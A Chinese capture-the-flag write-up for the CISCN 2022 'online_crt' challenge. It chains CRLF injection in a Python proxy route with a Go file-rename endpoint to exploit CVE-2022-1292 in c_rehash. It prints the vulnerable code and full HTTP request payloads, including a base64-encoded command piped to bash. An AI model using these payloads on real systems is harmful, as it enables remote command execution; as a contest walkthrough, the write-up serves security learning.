[CISCN 2022初赛] online_crt
CVE-2022-1292,主要思路就是生成证书之后,去利用proxy路由请求go server去修改证书的名称为反引号包裹的命令,然后再去访问Python的createlink路由从而调用c_rehash来触发RCE
注意go这里修改文件名的要求:
if c.Request.URL.RawPath != "" && c.Request.Host == "admin" {
err := os.Rename(staticPath+oldname, staticPath+newname)
if err != nil {
return
}
c.String(200, newname)
return
}
第一个判断直接将路径中的/替换为%2f即可通过,第二个要求HOST为admin,再去看Python的proxy路由怎么写的:
@app.route('/proxy', methods=['GET'])
def proxy():
uri = request.form.get("uri", "/")
client = socket.socket()
client.connect(('localhost', 8887))
msg = f'''GET {uri} HTTP/1.1
Host: test_api_host
User-Agent: Guest
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
'''
client.send(msg.encode())
data = client.recv(2048)
client.close()
return data.decode()
uri是被直接拼接进去的,因此存在CRLF漏洞,我们就可以篡改HOST为admin从而满足go server修改文件名的要求。
先去生成一个证书,然后得到证书名之后去修改文件名:
GET /proxy HTTP/1.1
Host: eci-2ze8dctuphp2eaffxazb.cloudeci1.ichunqiu.com:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
uri=/admin%252frename?oldname=58b2af81-92fd-42a2-a165-2ce4db8134a1.crt%26newname=`ls`.crt%20HTTP/1.1%0d%0aHost:%20admin%0d%0a%0d%0aGET%20/
没回显,发现curl什么都没办法外带,那就直接把回显写进文件里然后直接下载文件就行了:
uri=/admin%252frename?oldname=f3d356f9-edba-44e1-a208-4696529a2173.crt%26newname=`echo%2520Y2F0IC9mKj5h|base64%2520-d|bash`.crt%20HTTP/1.1%0d%0aHost:%20admin%0d%0a%0d%0aGET%20/
然后请求/creatlink,之后去/static/crt/a下载就可以得到flag了
[ * ]博客中转载的文章均已标明出处与来源,若无意产生侵权行为深表歉意,需要删除或更改请联系博主: 2245998470[at]qq.com